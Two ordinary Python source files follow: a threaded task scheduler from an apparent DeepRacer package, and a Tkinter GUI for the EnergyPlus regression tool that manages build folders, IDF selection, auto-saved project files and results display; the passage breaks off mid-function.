# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
scheduler.py
This module creates the Scheduler class, which is responsible for running a
background daemon thread that reads from a queue and executes the queued
function calls in a separate thread.
"""
import threading
import queue
from deepracer_systems_pkg import constants
#########################################################################################
# Scheduler class.
class Scheduler:
"""Class responsible to run background daemon thread and schedule function calls.
"""
def __init__(self, logger):
"""Create the Scheduler object.
Args:
logger (rclpy.rclpy.impl.rcutils_logger.RcutilsLogger):
Logger object of the software_update_node.
"""
self.stop = threading.Event()
self.queue = queue.Queue()
self.logger = logger
thread = threading.Thread(target=self.loop)
thread.start()
def loop(self):
"""Main daemon loop that reads from a queue and executes the function call.
"""
self.logger.info('Entering daemon loop.')
if constants.POST_LOOP_BREAK:
self.schedule_action(self.kill)
        while not self.stop.is_set():
            action, keyworded_args = self.queue.get()
            if len(keyworded_args):
                action(**keyworded_args)
            else:
                action()
self.logger.info('Exiting daemon loop.')
def schedule_action(self, action, **keyworded_args):
"""Helper method to add the function to the queue.
Args:
action (function): The function that is to be added to the execution queue.
"""
self.queue.put((action, keyworded_args))
def schedule_exit(self, **keyworded_args):
"""Helper method to stop the scheduler after executing all current calls in queue.
"""
self.schedule_action(self.kill)
def kill(self):
"""Wrapper method to set the stop event.
"""
self.stop.set()
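# Minimal usage sketch (the stand-in logger is an assumption; in the package a
# node's rclpy logger is passed in): queue one call, then ask the loop to exit.
def _demo_scheduler():
    import logging
    scheduler = Scheduler(logging.getLogger("scheduler_demo"))
    scheduler.schedule_action(lambda: print("hello from the scheduler thread"))
    scheduler.schedule_exit()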
|
tk_window.py
|
from datetime import datetime
from json import dumps, load as load_json_from_file
import os
from pathlib import Path
from platform import system
import random
import subprocess
import sys
from threading import Thread
from time import sleep
from tkinter import (
Tk, ttk, # Core pieces
PhotoImage, # for taskbar icon
Button, Frame, Label, LabelFrame, Listbox, Menu, OptionMenu, Scrollbar, Spinbox, # Widgets
StringVar, # Special Types
messagebox, # Dialog boxes
E, W, # Cardinal directions N, S,
X, Y, BOTH, # Orthogonal directions (for fill)
END, LEFT, TOP, # relative directions (RIGHT, TOP)
filedialog, simpledialog, # system dialogs
)
from typing import List, Union
import webbrowser
from pubsub import pub
from epregressions import VERSION
from epregressions.epw_map import get_epw_for_idf
from epregressions.runtests import TestRunConfiguration, SuiteRunner
from epregressions.structures import (
CompletedStructure,
ForceRunType,
ReportingFreq,
TestEntry,
)
from epregressions.builds.base import KnownBuildTypes, autodetect_build_dir_type, BaseBuildDirectoryStructure
from epregressions.builds.makefile import CMakeCacheMakeFileBuildDirectory
from epregressions.builds.visualstudio import CMakeCacheVisualStudioBuildDirectory
from epregressions.builds.install import EPlusInstallDirectory
class ResultsTreeRoots:
NumRun = "Cases run"
Success1 = "Case 1 Successful runs"
NotSuccess1 = "Case 1 Unsuccessful run"
Success2 = "Case 2 Successful runs"
NotSuccess2 = "Case 2 Unsuccessful run"
FilesCompared = "Files compared"
BigMath = "Files with BIG mathdiffs"
SmallMath = "Files with small mathdiffs"
BigTable = "Files with BIG tablediffs"
SmallTable = "Files with small tablediffs"
Textual = "Files with textual diffs"
@staticmethod
def get_all():
return [
ResultsTreeRoots.NumRun,
ResultsTreeRoots.Success1,
ResultsTreeRoots.NotSuccess1,
ResultsTreeRoots.Success2,
ResultsTreeRoots.NotSuccess2,
ResultsTreeRoots.FilesCompared,
ResultsTreeRoots.BigMath,
ResultsTreeRoots.SmallMath,
ResultsTreeRoots.BigTable,
ResultsTreeRoots.SmallTable,
ResultsTreeRoots.Textual,
]
class PubSubMessageTypes:
PRINT = '10'
STARTING = '20'
CASE_COMPLETE = '30'
SIMULATIONS_DONE = '40'
DIFF_COMPLETE = '50'
ALL_DONE = '60'
CANCELLED = '70'
class MyApp(Frame):
def __init__(self):
self.root = Tk(className='eplus_regression_runner')
Frame.__init__(self, self.root)
        # add the taskbar icon, but it's having issues reading the png on Mac, not sure why
if system() != 'Darwin':
img = PhotoImage(file=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'ep.png'))
self.root.iconphoto(False, img)
# high level GUI configuration
self.root.geometry('1000x600')
self.root.resizable(width=1, height=1)
self.root.option_add('*tearOff', False) # keeps file menus from looking weird
# members related to the background thread and operator instance
self.long_thread = None
self.background_operator: Union[None, SuiteRunner] = None
# tk variables we can access later
self.label_string = StringVar()
self.build_dir_1_var = StringVar()
self.build_dir_2_var = StringVar()
self.run_period_option = StringVar()
self.run_period_option.set(ForceRunType.NONE)
self.reporting_frequency = StringVar()
self.reporting_frequency.set(ReportingFreq.HOURLY)
self.num_threads_var = StringVar()
# widgets that we might want to access later
self.build_dir_1_button = None
self.build_dir_2_button = None
self.run_button = None
self.stop_button = None
self.build_dir_1_label = None
if system() == 'Windows':
self.build_dir_1_var.set(r'C:\EnergyPlus\repos\1eplus\builds\VS64')
elif system() == 'Darwin':  # platform.system() reports 'Darwin' on Mac
self.build_dir_1_var.set('/Users/elee/eplus/repos/1eplus/builds/r')
elif system() == 'Linux':
self.build_dir_1_var.set('/eplus/repos/1eplus/builds/r')
else:
self.build_dir_1_var.set("<Select build dir 1>")
self.build_dir_2_label = None
if system() == 'Windows':
self.build_dir_2_var.set(r'C:\EnergyPlus\repos\2eplus\builds\VS64')
elif system() == 'Darwin':  # platform.system() reports 'Darwin' on Mac
self.build_dir_2_var.set('/Users/elee/eplus/repos/2eplus/builds/r')
elif system() == 'Linux':
self.build_dir_2_var.set('/eplus/repos/2eplus/builds/r')
else:
self.build_dir_2_var.set("<Select build dir 2>")
self.progress = None
self.log_message_listbox = None
self.results_tree = None
self.num_threads_spinner = None
self.full_idf_listbox = None
self.move_idf_to_active_button = None
self.active_idf_listbox = None
self.remove_idf_from_active_button = None
self.idf_select_all_button = None
self.idf_select_almost_all_button = None
self.idf_deselect_all_button = None
self.idf_select_n_random_button = None
self.run_period_option_menu = None
self.reporting_frequency_option_menu = None
# some data holders
self.tree_folders = dict()
self.valid_idfs_in_listing = False
self.run_button_color = '#008000'
self.build_1 = None
self.build_2 = None
self.last_results = None
self.auto_saving = False
self.manually_saving = False
self.save_interval = 10000  # ms, so 10 seconds
# initialize the GUI
self.init_window()
# try to auto-load the last settings, and kick off the auto-save feature
self.client_open(auto_open=True)
self.root.after(self.save_interval, self.auto_save)
# wire up the background thread
pub.subscribe(self.print_handler, PubSubMessageTypes.PRINT)
pub.subscribe(self.starting_handler, PubSubMessageTypes.STARTING)
pub.subscribe(self.case_completed_handler, PubSubMessageTypes.CASE_COMPLETE)
pub.subscribe(self.runs_complete_handler, PubSubMessageTypes.SIMULATIONS_DONE)
pub.subscribe(self.diff_complete_handler, PubSubMessageTypes.DIFF_COMPLETE)
pub.subscribe(self.done_handler, PubSubMessageTypes.ALL_DONE)
pub.subscribe(self.cancelled_handler, PubSubMessageTypes.CANCELLED)
def init_window(self):
# changing the title of our master widget
self.root.title("EnergyPlus Regression Tool")
self.root.protocol("WM_DELETE_WINDOW", self.client_exit)
# create the menu
menu = Menu(self.root)
self.root.config(menu=menu)
file_menu = Menu(menu)
file_menu.add_command(label="Open Project...", command=self.client_open)
file_menu.add_command(label="Save Project...", command=self.client_save)
file_menu.add_command(label="Exit", command=self.client_exit)
menu.add_cascade(label="File", menu=file_menu)
help_menu = Menu(menu)
help_menu.add_command(label="Open Documentation...", command=self.open_documentation)
help_menu.add_command(label="About...", command=self.about_dialog)
menu.add_cascade(label="Help", menu=help_menu)
# main notebook holding everything
main_notebook = ttk.Notebook(self.root)
# run configuration
pane_run = Frame(main_notebook)
group_build_dir_1 = LabelFrame(pane_run, text="Build Directory 1")
group_build_dir_1.pack(fill=X, padx=5)
self.build_dir_1_button = Button(group_build_dir_1, text="Change...", command=self.client_build_dir_1)
self.build_dir_1_button.grid(row=1, column=1, sticky=W)
self.build_dir_1_label = Label(group_build_dir_1, textvariable=self.build_dir_1_var)
self.build_dir_1_label.grid(row=1, column=2, sticky=E)
group_build_dir_2 = LabelFrame(pane_run, text="Build Directory 2")
group_build_dir_2.pack(fill=X, padx=5)
self.build_dir_2_button = Button(group_build_dir_2, text="Change...", command=self.client_build_dir_2)
self.build_dir_2_button.grid(row=1, column=1, sticky=W)
self.build_dir_2_label = Label(group_build_dir_2, textvariable=self.build_dir_2_var)
self.build_dir_2_label.grid(row=1, column=2, sticky=E)
group_run_options = LabelFrame(pane_run, text="Run Options")
group_run_options.pack(fill=X, padx=5)
Label(group_run_options, text="Number of threads for suite: ").grid(row=1, column=1, sticky=E)
self.num_threads_spinner = Spinbox(group_run_options, from_=1, to_=48, textvariable=self.num_threads_var)
self.num_threads_spinner.grid(row=1, column=2, sticky=W)
Label(group_run_options, text="Test suite run configuration: ").grid(row=2, column=1, sticky=E)
self.run_period_option_menu = OptionMenu(group_run_options, self.run_period_option, *ForceRunType.get_all())
self.run_period_option_menu.grid(row=2, column=2, sticky=W)
Label(group_run_options, text="Minimum reporting frequency: ").grid(row=3, column=1, sticky=E)
self.reporting_frequency_option_menu = OptionMenu(
group_run_options, self.reporting_frequency, *ReportingFreq.get_all()
)
self.reporting_frequency_option_menu.grid(row=3, column=2, sticky=W)
main_notebook.add(pane_run, text='Configuration')
# now let's set up a list of checkboxes for selecting IDFs to run
pane_idfs = Frame(main_notebook)
group_idf_tools = LabelFrame(pane_idfs, text="IDF Selection Tools")
group_idf_tools.pack(fill=X, padx=5)
self.idf_select_all_button = Button(
group_idf_tools, text="Refresh", command=self.client_idf_refresh
)
self.idf_select_all_button.pack(side=LEFT, expand=1)
self.idf_select_all_button = Button(
group_idf_tools, text="Select All", command=self.idf_select_all
)
self.idf_select_all_button.pack(side=LEFT, expand=1)
self.idf_select_almost_all_button = Button(
group_idf_tools, text="Select All Except Long Runs", command=self.idf_select_all_except_long_runs
)
self.idf_select_almost_all_button.pack(side=LEFT, expand=1)
self.idf_deselect_all_button = Button(
group_idf_tools, text="Deselect All", command=self.idf_deselect_all
)
self.idf_deselect_all_button.pack(side=LEFT, expand=1)
self.idf_select_n_random_button = Button(
group_idf_tools, text="Select N Random", command=self.idf_select_random
)
self.idf_select_n_random_button.pack(side=LEFT, expand=1)
group_full_idf_list = LabelFrame(pane_idfs, text="Full IDF List")
group_full_idf_list.pack(fill=BOTH, expand=True, padx=5)
scrollbar = Scrollbar(group_full_idf_list)
self.full_idf_listbox = Listbox(group_full_idf_list, yscrollcommand=scrollbar.set)
self.full_idf_listbox.bind('<Double-1>', self.idf_move_to_active)
self.full_idf_listbox.pack(fill=BOTH, side=LEFT, expand=True)
scrollbar.pack(fill=Y, side=LEFT)
scrollbar.config(command=self.full_idf_listbox.yview)
down_arrows = " ↓ " * 4
self.move_idf_to_active_button = Button(
pane_idfs, text=down_arrows + "Add to Active List" + down_arrows, command=self.idf_move_to_active
)
self.move_idf_to_active_button.pack(side=TOP, fill=X, expand=False)
up_arrows = " ↑ " * 4
self.remove_idf_from_active_button = Button(
pane_idfs, text=up_arrows + "Remove from Active List" + up_arrows, command=self.idf_remove_from_active
)
self.remove_idf_from_active_button.pack(side=TOP, fill=X, expand=False)
group_active_idf_list = LabelFrame(pane_idfs, text="Active IDF List")
group_active_idf_list.pack(fill=BOTH, expand=True, padx=5)
scrollbar = Scrollbar(group_active_idf_list)
self.active_idf_listbox = Listbox(group_active_idf_list, yscrollcommand=scrollbar.set)
self.active_idf_listbox.bind('<Double-1>', self.idf_remove_from_active)
self.active_idf_listbox.pack(fill=BOTH, side=LEFT, expand=True)
scrollbar.pack(fill=Y, side=LEFT)
scrollbar.config(command=self.active_idf_listbox.yview)
self.build_idf_listing(initialize=True)
main_notebook.add(pane_idfs, text="IDF Selection")
# set up a scrolled listbox for the log messages
frame_log_messages = Frame(main_notebook)
group_log_messages = LabelFrame(frame_log_messages, text="Log Message Tools")
group_log_messages.pack(fill=X, padx=5)
Button(group_log_messages, text="Clear Log Messages", command=self.clear_log).pack(side=LEFT, expand=1)
Button(group_log_messages, text="Copy Log Messages", command=self.copy_log).pack(side=LEFT, expand=1)
scrollbar = Scrollbar(frame_log_messages)
self.log_message_listbox = Listbox(frame_log_messages, yscrollcommand=scrollbar.set)
self.add_to_log("Program started!")
self.log_message_listbox.pack(fill=BOTH, side=LEFT, expand=True)
scrollbar.pack(fill=Y, side=LEFT)
scrollbar.config(command=self.log_message_listbox.yview)
main_notebook.add(frame_log_messages, text="Log Messages")
# set up a tree-view for the results
frame_results = Frame(main_notebook)
scrollbar = Scrollbar(frame_results)
self.results_tree = ttk.Treeview(frame_results, columns=("Base File", "Mod File"))
self.results_tree.bind('<Double-1>', self.results_double_click)
self.results_tree.heading("#0", text="Results")
self.results_tree.column('#0', minwidth=200, width=200)
self.results_tree.heading("Base File", text="Base File")
self.results_tree.column("Base File", minwidth=100, width=100)
self.results_tree.heading("Mod File", text="Mod File")
self.results_tree.column("Mod File", minwidth=100, width=100)
self.build_results_tree()
self.results_tree.pack(fill=BOTH, side=LEFT, expand=True)
scrollbar.pack(fill=Y, side=LEFT)
scrollbar.config(command=self.results_tree.yview)
main_notebook.add(frame_results, text="Results")
# pack the main notebook on the window
main_notebook.pack(fill=BOTH, expand=1)
# status bar at the bottom
frame_status = Frame(self.root)
self.run_button = Button(frame_status, text="Run", bg=self.run_button_color, command=self.client_run)
self.run_button.pack(side=LEFT, expand=0)
self.stop_button = Button(frame_status, text="Stop", command=self.client_stop, state='disabled')
self.stop_button.pack(side=LEFT, expand=0)
self.progress = ttk.Progressbar(frame_status, length=250)
self.progress.pack(side=LEFT, expand=0)
label = Label(frame_status, textvariable=self.label_string)
self.label_string.set("Initialized")
label.pack(side=LEFT, anchor=W)
frame_status.pack(fill=X)
def run(self):
self.root.mainloop()
# noinspection PyBroadException
def client_open(self, auto_open=False):
if auto_open:
open_file = os.path.join(os.path.expanduser("~"), ".regression-auto-save.ept")
if not os.path.exists(open_file):
return
open_load_file = open(open_file)
else:
open_load_file = filedialog.askopenfile(filetypes=(('ept (json) files', '.ept'),))
if not open_load_file:
return
try:
data = load_json_from_file(open_load_file)
except Exception:
if auto_open:
return # just quietly move along
simpledialog.messagebox.showerror("Load Error", "Could not load file contents as JSON!")
return
try:
self.num_threads_var.set(data['threads'])
self.run_period_option.set(data['config'])
self.reporting_frequency.set(data['report_freq'])
status = self.try_to_set_build_1_to_dir(data['build_1_build_dir'])
if status:
self.build_dir_1_var.set(data['build_1_build_dir'])
status = self.try_to_set_build_2_to_dir(data['build_2_build_dir'])
if status:
self.build_dir_2_var.set(data['build_2_build_dir'])
self.build_idf_listing(False, data['idfs'])
self.add_to_log("Project settings loaded")
except Exception:
if auto_open:
return # quietly leave
simpledialog.messagebox.showerror("Load Error", "Could not load data from project file")
def auto_save(self):
if self.manually_saving or self.auto_saving:
self.root.after(self.save_interval, self.auto_save)  # busy right now, try again later
return
self.client_save(auto_save=True)
self.root.after(self.save_interval, self.auto_save)
def client_save(self, auto_save=False):
# we shouldn't come into this function from the auto_save if any other saving is going on already
if self.auto_saving:
# if we get in here from the save menu and we are already trying to auto-save, give it a sec and retry
sleep(0.5)
if self.auto_saving:
# if we are still auto-saving, then just go ahead and warn
messagebox.showwarning("Auto-saving was already in process, try again.")
return
potential_num_threads = self.num_threads_var.get()
# noinspection PyBroadException
try:
num_threads = int(potential_num_threads)
idfs = []
for this_file in self.active_idf_listbox.get(0, END):
idfs.append(this_file)
these_results = {}
if self.last_results:
these_results = self.last_results.to_json_summary()
json_object = {
'config': self.run_period_option.get(),
'report_freq': self.reporting_frequency.get(),
'threads': num_threads,
'idfs': idfs,
'build_1_build_dir': self.build_1.build_directory,
'build_2_build_dir': self.build_2.build_directory,
'last_results': these_results,
}
except Exception as e:
# if we hit an exception, our action depends on whether we are manually saving or auto-saving
if auto_save:
... # just return quietly
print(e)
else:
messagebox.showerror( # issue an error before leaving
"Save Error",
"Could not save the project because some fields are not yet filled in; "
"check inputs including valid build folders"
)
return
if auto_save:
self.auto_saving = True
save_file = os.path.join(os.path.expanduser("~"), ".regression-auto-save.ept")
open_save_file = open(save_file, 'w')
else:
self.manually_saving = True
open_save_file = filedialog.asksaveasfile(defaultextension='.ept')
if not open_save_file:
self.manually_saving = False  # user cancelled the dialog; release the save lock
return
open_save_file.write(dumps(json_object, indent=2))
open_save_file.close()
if auto_save:
self.auto_saving = False
else:
self.manually_saving = False
def results_double_click(self, event):
cur_item = self.results_tree.item(self.results_tree.focus())
col = self.results_tree.identify_column(event.x)
if col == '#1':
cell_value = cur_item['values'][2] # hidden column with base directory
elif col == '#2':
cell_value = cur_item['values'][3] # hidden column with mod directory
else:
return
self.open_file_browser_to_directory(cell_value)
@staticmethod
def open_file_browser_to_directory(dir_to_open):
this_platform = system()
p = None
if this_platform == 'Linux':
try:
p = subprocess.Popen(['xdg-open', dir_to_open])
except Exception as this_exception: # pragma: no cover - not covering bad directories
print("Could not open file:")
print(this_exception)
elif this_platform == 'Windows': # pragma: no cover - only testing on Linux
try:
p = subprocess.Popen(['start', dir_to_open], shell=True)
except Exception as this_exception:
print("Could not open file:")
print(this_exception)
elif this_platform == 'Darwin': # pragma: no cover - only testing on Linux
try:
p = subprocess.Popen(['open', dir_to_open])
except Exception as this_exception:
print("Could not open file:")
print(this_exception)
return p
@staticmethod
def open_documentation():
url = 'https://energyplusregressiontool.readthedocs.io/en/latest/'
# noinspection PyBroadException
try:
webbrowser.open_new_tab(url)
except Exception:
# error message
messagebox.showerror("Docs problem", "Could not open documentation in browser")
@staticmethod
def about_dialog():
messagebox.showinfo("About", f"EnergyPlus Regression Tool\nVersion: {VERSION}")
def build_idf_listing(self, initialize=False, desired_selected_idfs: List[str] = None):
# if we don't have a specific list, then try to save any already selected ones first
if desired_selected_idfs:
desired_selected_idfs = set(desired_selected_idfs)
else:
desired_selected_idfs = set()
for this_file in self.active_idf_listbox.get(0, END):
desired_selected_idfs.add(this_file)
# clear any existing ones
self.active_idf_listbox.delete(0, END)
self.full_idf_listbox.delete(0, END)
# now rebuild them
self.valid_idfs_in_listing = False
path_1 = Path(self.build_dir_1_var.get())
path_2 = Path(self.build_dir_2_var.get())
if path_1.exists() and path_2.exists():
if not self.build_1:
status = self.try_to_set_build_1_to_dir(self.build_dir_1_var.get())
if not status:
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Build folder path #1 is invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
return
if not self.build_2:
status = self.try_to_set_build_2_to_dir(self.build_dir_2_var.get())
if not status:
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Build folder path #2 is invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
return
idf_dir_1 = self.build_1.get_idf_directory()
idfs_dir_1 = BaseBuildDirectoryStructure.get_idfs_in_dir(idf_dir_1)
idf_dir_2 = self.build_2.get_idf_directory()
idfs_dir_2 = BaseBuildDirectoryStructure.get_idfs_in_dir(idf_dir_2)
common_idfs = idfs_dir_1.intersection(idfs_dir_2)
if len(common_idfs) == 0:
self.full_idf_listbox.insert(END, "No common IDFs found between build folders")
self.full_idf_listbox.insert(END, "Select valid build folders to fill listing")
return
for idf in sorted(common_idfs):
self.full_idf_listbox.insert(END, str(idf))
self.valid_idfs_in_listing = True
elif initialize:
self.full_idf_listbox.insert(END, "This will be the master list")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
elif path_1.exists():
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Build folder path #2 is invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
elif path_2.exists():
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Build folder path #1 is invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
else:
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Both build folders are invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
all_idfs_in_full_list = set(self.full_idf_listbox.get(0, END))
common_idfs = all_idfs_in_full_list.intersection(desired_selected_idfs)
for idf in sorted(common_idfs):
self.active_idf_listbox.insert(END, idf)
def build_results_tree(self, results: CompletedStructure = None):
self.results_tree.delete(*self.results_tree.get_children())
if not results:
return
root_and_files = {
ResultsTreeRoots.NumRun: results.all_files,
ResultsTreeRoots.Success1: results.success_case_a,
ResultsTreeRoots.NotSuccess1: results.failure_case_a,
ResultsTreeRoots.Success2: results.success_case_b,
ResultsTreeRoots.NotSuccess2: results.failure_case_b,
ResultsTreeRoots.FilesCompared: results.total_files_compared,
ResultsTreeRoots.BigMath: results.big_math_diffs,
ResultsTreeRoots.SmallMath: results.small_math_diffs,
ResultsTreeRoots.BigTable: results.big_table_diffs,
ResultsTreeRoots.SmallTable: results.small_table_diffs,
ResultsTreeRoots.Textual: results.text_diffs
}
for root, these_results in root_and_files.items():
num_items = sum([len(y) for _, y in these_results.descriptions.items()])
self.tree_folders[root] = self.results_tree.insert(
parent="", index=END, text=f"{root} ({num_items})", values=("", "")
)
for base_name, result_list in these_results.descriptions.items():
dir_1 = os.path.join(results.results_dir_a, base_name)
dir_2 = os.path.join(results.results_dir_b, base_name)
for result in result_list:
self.results_tree.insert(
parent=self.tree_folders[root], index=END, text=result,
values=(
"Double click to see base run results", "Double click to see mod run results", dir_1, dir_2
)
)
self.last_results = results
def add_to_log(self, message):
if self.log_message_listbox:
self.log_message_listbox.insert(END, f"[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}]: {message}")
self.log_message_listbox.yview(END)
if self.label_string:
self.label_string.set(message)
def clear_log(self):
self.log_message_listbox.delete(0, END)
def copy_log(self):
messages = self.log_message_listbox.get(0, END)
message_string = '\n'.join(messages)
self.root.clipboard_clear()
self.root.clipboard_append(message_string)
def client_idf_refresh(self):
self.build_idf_listing()
def idf_move_to_active(self, _=None):
if self.long_thread:
return
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
current_selection = self.full_idf_listbox.curselection()
if not current_selection:
simpledialog.messagebox.showerror("IDF Selection Error", "No IDF Selected")
return
currently_selected_idf = self.full_idf_listbox.get(current_selection)
try:
self.active_idf_listbox.get(0, END).index(currently_selected_idf)
simpledialog.messagebox.showwarning("IDF Selection Warning", "IDF already exists in active list")
return
except ValueError:
pass # the value error indicates it was _not_ found, so this is success
self.active_idf_listbox.insert(END, currently_selected_idf)
self.idf_refresh_count_status(currently_selected_idf, True)
def idf_remove_from_active(self, event=None):
if self.long_thread:
return
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
current_selection = self.active_idf_listbox.curselection()
if not current_selection:
if event:
return
simpledialog.messagebox.showerror("IDF Selection Error", "No IDF Selected")
return
self.active_idf_listbox.delete(current_selection)
self.idf_refresh_count_status(current_selection, False)
def idf_select_all(self):
self.idf_deselect_all()
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
all_idfs = self.full_idf_listbox.get(0, END)
for idf in all_idfs:
self.active_idf_listbox.insert(END, idf)
self.idf_refresh_count_status()
def idf_select_all_except_long_runs(self):
self.idf_deselect_all()
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
all_idfs = self.full_idf_listbox.get(0, END)
for idf in all_idfs:
skip_list = [
'LgOffVAVusingBasement.idf',
'HospitalLowEnergy.idf',
'SingleFamilyHouse_HP_Slab_Dehumidification.idf',
'SingleFamilyHouse_HP_Slab.idf'
]
if idf in skip_list:
continue
self.active_idf_listbox.insert(END, idf)
self.idf_refresh_count_status()
def idf_deselect_all(self):
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
self.active_idf_listbox.delete(0, END)
self.idf_refresh_count_status()
def idf_select_random(self):
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
potential_number_to_select = simpledialog.askinteger("Input Amount", "How many would you like to select?")
if not potential_number_to_select:
return
self.idf_deselect_all()
number_to_select = int(potential_number_to_select)
number_of_idf_files = self.full_idf_listbox.size()
if number_of_idf_files <= number_to_select: # just take all of them
self.idf_select_all()
else: # down select randomly
indices_to_take = random.sample(range(number_of_idf_files), number_to_select)
idfs_to_take = list()
for i in indices_to_take:
idf_to_get = self.full_idf_listbox.get(i)
idfs_to_take.append(idf_to_get)
for idf_to_get in sorted(idfs_to_take):
self.active_idf_listbox.insert(END, idf_to_get)
self.idf_refresh_count_status()
def idf_refresh_count_status(self, test_case=None, checked=False):
if not self.valid_idfs_in_listing:
return
num_total = self.full_idf_listbox.size()
num_active = self.active_idf_listbox.size()
if test_case:
chk_string = "Checked" if checked else "Unchecked"
if checked:
self.label_string.set(f"{chk_string} {test_case} ({num_active}/{num_total} selected)")
else:
self.label_string.set(f"{num_active}/{num_total} selected")
def set_gui_status_for_run(self, is_running: bool):
if is_running:
run_button_state = 'disabled'
stop_button_state = 'normal'
else:
run_button_state = 'normal'
stop_button_state = 'disabled'
self.build_dir_1_button.configure(state=run_button_state)
self.build_dir_2_button.configure(state=run_button_state)
self.run_button.configure(state=run_button_state)
self.idf_select_all_button.configure(state=run_button_state)
self.idf_deselect_all_button.configure(state=run_button_state)
self.idf_select_n_random_button.configure(state=run_button_state)
self.move_idf_to_active_button.configure(state=run_button_state)
self.remove_idf_from_active_button.configure(state=run_button_state)
self.run_period_option_menu.configure(state=run_button_state)
self.reporting_frequency_option_menu.configure(state=run_button_state)
self.num_threads_spinner.configure(state=run_button_state)
self.stop_button.configure(state=stop_button_state)
def try_to_set_build_1_to_dir(self, selected_dir) -> bool:
probable_build_dir_type = autodetect_build_dir_type(selected_dir)
if probable_build_dir_type == KnownBuildTypes.Unknown:
self.add_to_log("Could not detect build 1 type")
return False
elif probable_build_dir_type == KnownBuildTypes.Installation:
self.add_to_log("Build 1 type detected as an EnergyPlus Install")
self.build_1 = EPlusInstallDirectory()
self.build_1.set_build_directory(selected_dir)
elif probable_build_dir_type == KnownBuildTypes.VisualStudio:
self.add_to_log("Build 1 type detected as a Visual Studio build")
self.build_1 = CMakeCacheVisualStudioBuildDirectory()
self.build_1.set_build_directory(selected_dir)
elif probable_build_dir_type == KnownBuildTypes.Makefile:
self.add_to_log("Build 1 type detected as a Makefile-style build")
self.build_1 = CMakeCacheMakeFileBuildDirectory()
self.build_1.set_build_directory(selected_dir)
return True
def client_build_dir_1(self):
selected_dir = filedialog.askdirectory()
if not selected_dir:
return
if not os.path.exists(selected_dir):
return
status = self.try_to_set_build_1_to_dir(selected_dir)
if not status:
simpledialog.messagebox.showerror(
"Build folder problem", f"Could not determine build type for build 1: {selected_dir}!"
)
return
self.build_dir_1_var.set(selected_dir)
self.build_idf_listing()
def try_to_set_build_2_to_dir(self, selected_dir) -> bool:
probable_build_dir_type = autodetect_build_dir_type(selected_dir)
if probable_build_dir_type == KnownBuildTypes.Unknown:
self.add_to_log("Could not detect build 2 type")
return False
elif probable_build_dir_type == KnownBuildTypes.Installation:
self.add_to_log("Build 2 type detected as an EnergyPlus Install")
self.build_2 = EPlusInstallDirectory()
self.build_2.set_build_directory(selected_dir)
elif probable_build_dir_type == KnownBuildTypes.VisualStudio:
self.add_to_log("Build 2 type detected as a Visual Studio build")
self.build_2 = CMakeCacheVisualStudioBuildDirectory()
self.build_2.set_build_directory(selected_dir)
elif probable_build_dir_type == KnownBuildTypes.Makefile:
self.add_to_log("Build 2 type detected as a Makefile-style build")
self.build_2 = CMakeCacheMakeFileBuildDirectory()
self.build_2.set_build_directory(selected_dir)
return True
def client_build_dir_2(self):
selected_dir = filedialog.askdirectory()
if not selected_dir:
return
if not os.path.exists(selected_dir):
return
status = self.try_to_set_build_2_to_dir(selected_dir)
if not status:
simpledialog.messagebox.showerror("Could not determine build type for build 2!")
return
self.build_dir_2_var.set(selected_dir)
self.build_idf_listing()
def client_run(self):
if self.long_thread:
messagebox.showerror("Cannot run another thread, wait for the current to finish -- how'd you get here?!?")
return
potential_num_threads = self.num_threads_var.get()
try:
num_threads = int(potential_num_threads)
except ValueError:
messagebox.showerror("Invalid Configuration", "Number of threads must be an integer")
return
if not self.build_1:
messagebox.showerror("Build folder 1 problem", "Select a valid build folder 1 prior to running")
return
build_1_valid = self.build_1.verify()
build_1_problem_files = [b[1] for b in build_1_valid if not b[2]]
if len(build_1_problem_files):
missing_files = '\n'.join(build_1_problem_files)
messagebox.showerror("Build folder 1 problem", f"Missing files:\n{missing_files}")
return
if not self.build_2:
messagebox.showerror("Build folder 2 problem", "Select a valid build folder 2 prior to running")
return
build_2_valid = self.build_2.verify()
build_2_problem_files = [b[1] for b in build_2_valid if not b[2]]
if len(build_2_problem_files):
missing_files = '\n'.join(build_2_problem_files)
messagebox.showerror("Build folder 2 problem", f"Missing files:\n{missing_files}")
return
run_configuration = TestRunConfiguration(
force_run_type=self.run_period_option.get(),
num_threads=num_threads,
report_freq=self.reporting_frequency.get(),
build_a=self.build_1,
build_b=self.build_2
)
idfs_to_run = list()
for this_file in self.active_idf_listbox.get(0, END):
# using build 1 as the basis for getting a weather file # TODO: Allow different EPWs for build 1, 2
potential_epw = get_epw_for_idf(self.build_1.source_directory, this_file)
idfs_to_run.append(
TestEntry(this_file, potential_epw)
)
if len(idfs_to_run) == 0:
